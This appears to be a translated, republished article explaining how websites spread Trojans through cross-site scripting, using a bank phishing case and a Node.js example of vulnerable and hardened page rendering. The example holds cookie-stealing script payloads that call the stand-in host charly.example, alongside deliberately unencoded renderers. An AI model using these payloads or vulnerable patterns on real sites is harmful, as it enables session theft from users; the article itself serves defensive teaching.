Early Prevention of webpage Trojans

Source: Internet
Author: User

Typhoid is a highly contagious disease: being exposed to a patient is enough to catch it. Because web applications all speak the same standard protocols, a web server that has been seeded with a Trojan infects its visitors much as a contagious patient infects the people around him, and the visitors then have their information stolen and their machines damaged:

If you use the Internet often, you have probably clicked a link and had your anti-virus software raise an alarm about a virus or Trojan. Ms. Y, director of a bank's technology department, was troubled by exactly such a customer complaint: an online banking user had received an email announcing an online banking promotion, and when she clicked through, her anti-virus software reported the website as carrying a Trojan.

After Ms. Y apologized, the customer's anger subsided and she agreed to forward the offending email. The email advertised a small survey that the bank really was running at the time, but clicking its "participate in activity" button immediately triggered the anti-virus alarm. Analysis by a professional security company showed that the email was forged: the attacker had replaced the URL behind the "participate in activity" button. A user who clicked it did land on the bank's real activity page, but the page also loaded content from a malicious site that dropped a Trojan, which is what the anti-virus software detected. The root cause was a defect in the bank's own page code that allowed the crafted link to inject that content. Given the bank's business continuity requirements, Ms. Y bought the security protection products the experts recommended and deployed them quickly to stop further attacks of this kind.

Why can a webpage link cause a Trojan to be implanted? There are several possibilities:

A) The website owner deliberately embeds malicious code in the pages. This is common on private websites: for personal gain, some webmasters deliberately embed malicious code in their pages to steal visitors' information. Enterprise sites generally do not do this.

B) An attacker adds malicious code to an otherwise normal page. Sometimes this follows a break-in that gives the attacker write access to the server; in the scenario described here it is done without any server compromise at all, by exploiting a cross-site scripting (XSS) vulnerability ※.

※Explanation: XSS (Cross-Site Scripting) Attacks

XSS is a class of security vulnerability common in web applications. It allows a malicious user to inject code, typically HTML and client-side script, into pages that are served to other users. Because the injected script runs in the victim's browser with the origin of the vulnerable site, the attacker effectively bypasses browser access controls such as the same-origin policy. XSS is widely known because attackers use it to build far more convincing phishing attacks than a look-alike domain alone allows. The root cause is the failure to validate untrusted input and, above all, to encode it on output; any web application framework can be affected if its developers do not do this.

In practice, XSS attacks take two common forms: stored (persistent) attacks and reflected attacks. (A third form, DOM-based XSS, in which the injection happens entirely within client-side script, also exists but is not covered here.)

Stored XSS: the most common type. The attacker submits a script as ordinary content (a post, a comment, a profile field); the web server stores it and later includes it in pages served to every visitor of that page, including the site's administrator. The attack proceeds as follows:

Bob runs a website that lets users publish and read posted information.

Charly notices that Bob's website has an XSS vulnerability.

Charly posts an attractive item whose body contains a malicious script, so that other users will open it.

Bob, or anyone else such as Alice, views the item; the script runs in the viewer's browser and sends his session cookie or other information to Charly.

Reflected XSS: when a server-side script builds a page from data supplied by the client and inserts that unvalidated data into the page without HTML entity encoding, client-side code can be injected into the dynamic page through the request itself (typically a URL parameter). The attack proceeds as follows:

Alice regularly uses a website run by Bob. She logs on with a user name and password, and the site stores her sensitive information (such as bank account details).

Charly finds that Bob's website contains a reflected XSS vulnerability.

Charly crafts a URL that exploits the vulnerability, wraps it in an email that impersonates Bob, and sends it to Alice.

Alice logs on to Bob's website and then opens the URL Charly provided.

The malicious script embedded in the URL is reflected into the response and executes in Alice's browser exactly as if it had come from Bob's server. It reads sensitive information (session token, card and account details, and so on) and sends it to Charly's site without Alice noticing anything.
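To make the two mechanisms concrete, here is an added example in Node.js; it is not code from the original article or from any real site. It models Bob's site as two functions, a comment board (stored) and a search page that echoes its query (reflected), each in a vulnerable form beside a hardened form that applies the HTML entity encoding the text refers to. The host names bob.example and charly.example, the payloads and the posts are all constructed for the illustration. The hardened functions are also the code-level fix recommended later in the article.

```javascript
// Added example, not code from the original article: a toy version of Bob's
// site showing stored and reflected XSS side by side with the hardened form.
// Runs under Node.js with no network; all hosts and payloads are constructed.

// Encode the five characters that can break out of an HTML text or attribute
// context. This is the "HTML entity encoding" the article refers to.
const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ENTITY_MAP[c]);
}

// ---- Stored XSS: user posts are saved and rendered to every visitor ----
const posts = []; // stands in for Bob's database

function addPost(author, body) {
  posts.push({ author, body });
}

// Vulnerable: post bodies are concatenated straight into the page.
function renderPostsVulnerable() {
  return posts.map((p) => `<li><b>${p.author}</b>: ${p.body}</li>`).join('\n');
}

// Hardened: every user-controlled value is entity-encoded on output.
function renderPostsSafe() {
  return posts
    .map((p) => `<li><b>${escapeHtml(p.author)}</b>: ${escapeHtml(p.body)}</li>`)
    .join('\n');
}

// ---- Reflected XSS: a search page echoes the q parameter back ----
function getQuery(url) {
  return new URL(url).searchParams.get('q') || '';
}

function renderSearchVulnerable(url) {
  return `<p>Results for: ${getQuery(url)}</p>`;
}

function renderSearchSafe(url) {
  return `<p>Results for: ${escapeHtml(getQuery(url))}</p>`;
}

// Deliberately crude check used only to compare the two renderings: does the
// page contain a <script> element? Browsers run script through many other
// constructs too, which is why the fix is output encoding, not filtering.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed data. Alice posts something harmless; Charly posts a payload that
// ships every reader's cookie to a host he controls (charly.example is hypothetical).
addPost('Alice', 'Hello & welcome');
addPost('Charly', '<script>new Image().src="https://charly.example/c?"+document.cookie</script>');

// Charly's reflected payload, sent to Alice inside a forged email from "Bob".
const charlyLink = 'https://bob.example/search?q=' +
  encodeURIComponent('<script>fetch("https://charly.example/c?"+document.cookie)</script>');

// Collect all four renderings so the difference can be inspected in one place.
function demo() {
  return {
    storedVulnerable: renderPostsVulnerable(),
    storedSafe: renderPostsSafe(),
    reflectedVulnerable: renderSearchVulnerable(charlyLink),
    reflectedSafe: renderSearchSafe(charlyLink),
  };
}
```

Note that both vulnerable renderers are "correct" from a functional point of view; the bug is purely that untrusted text is treated as markup. Encoding at the point of output, in the context the value is inserted into, closes both the stored and the reflected case at once, which is why it is the fix to reach for before any filtering or blocking product.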

In the case above, Ms. Y's bank was hit by this reflected type of XSS attack.

How do I tell whether I have been hit by an XSS attack? As with other common attacks, many free XSS tools are available on the Internet, and the people using them often do not know how to clean up the server logs, so log analysis usually reveals an attack: look for requests whose parameters contain script tags, event-handler attributes, or their URL-encoded equivalents. A more direct method is to inspect the page source for URLs or strings that have nothing to do with the page's function; if a page file contains code unrelated to what the page does, an XSS attack (or a direct modification of the page) has very likely taken place.

Because the direct victims of XSS are not the website owner but the ordinary users who visit the attacked site, those users often discover that the website has been compromised while the administrator still knows nothing about it. For organizations whose business depends on their websites (financial institutions, for example), a proactive site inspection service is therefore very important.

※Explanation: website Inspection Service

The consequences of an XSS attack are generally hard to discover directly. In the case above, for instance, if the attacker had injected a cookie-stealing script instead of a webpage Trojan, the victims would have seen no symptoms at all, and the threat would have been all the more dangerous.

A common approach is to buy a webpage Trojan monitoring service from a professional security company and have the website pages checked for malicious code on a regular schedule.

What should I do after an XSS attack? First inspect the attacked page and remove the malicious code, then plan future defenses. Like most web threats, XSS comes from flaws in how page files are written, so the root fix is at the code level: validate input and, above all, entity-encode every user-controlled value on output. You can also deploy independent security products in front of the application. Because code changes can be complex and slow to roll out across a large site, relying on code fixes alone is rarely practical; the usual choice is to deploy security products capable of application-layer threat protection as a compensating control (not described further here). Intrusion prevention products are also widely used in real-world XSS defense.

A website seeded with a Trojan is like a typhoid patient: anyone who comes into contact carelessly (clicks the link) may be infected (receive the Trojan). Traditional Chinese medicine holds that the guiding principle for treating the six-meridian diseases is to expel the external pathogen and support the body's own vitality. The remedy for a Trojan-infected website should follow the same pattern: expel the external pathogen (clean up the infected pages) and strengthen the body's defenses (add security devices, code assessment services, code patching, and other measures that improve the website's internal defensive capability).


The content of this page was sourced from the Internet and does not represent Alibaba Cloud's opinion; the products and services mentioned have no relationship with Alibaba Cloud.
